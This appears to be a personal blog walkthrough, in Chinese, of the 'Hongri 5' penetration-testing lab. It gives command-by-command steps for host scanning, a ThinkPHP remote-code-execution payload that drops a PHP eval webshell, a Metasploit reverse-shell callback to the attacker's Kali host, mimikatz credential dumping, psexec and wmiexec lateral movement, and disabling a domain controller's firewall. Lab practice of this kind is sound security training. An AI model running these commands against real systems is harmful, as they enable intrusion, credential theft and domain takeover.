SugarCrash!

记录学习,想找个师傅带带我

0%

红日五

kali 扫描存活

1
2
arp-scan -l 
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.31.1/24



报错看版本

1
2
3
4
5
6
exp 
http://192.168.31.229/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[whoami]);?>" > shell.php
我用的工具
echo "<?php eval($_POST['hack']); ?>" > shell.php
dir
type shell.php


1
2
3
4
5
6
7
8
msf的web投递前提是能和kali联通, 
use exploit/multi/script/web_delivery
set target 2 # 选择使用powershell类型的payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.96
exploit
复制到蚁剑执行
session看一下会话 ,会话就来了


也让他的cs上线

一顿信息收集
net view

1
2
3
4
msf开代理搞192.168.138.138 
抓密码 load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords


报错了,这一看就是位数不对,
mimikatz是32位,不能访问64位的,
那就给迁移到64位 ps看进程 找个64位的进程
进程迁移 migrate pid号

拿到域管理员的用户名和密码
administrator/123dc.com

利用Psexec登录域控

1
2
3
4
5
6
7
8
9
use exploit/windows/smb/psexec 
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass DC123.com
set payload windows/meterpreter/bind_tcp
set rhost 192.168.138.138
set lport 6666
run

1
2
3
4
5
失败了, 服务启动超时,试试是不是防火墙,利用shell建立连接,
关闭防火墙
net use \\192.168.138.138\ipc$ "dc123.com" /user:"administrator"
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 start unablefirewall


再次连接,,,不就来了吗

直接就是一个system权限

1
2
3
4
开启远程桌面 
use post/windows/manage/enable_rdp
set session 3
run
1
2
3
4
代理连接3389 
proxychains rdesktop 192.168.138.138
sun\administrator
123dc.com登录成功
1
2
3
4
wmiexec.exe administrator:123dc.com@192.168.138.138 
put mz64.exe
dir
mz64.exe 拿下了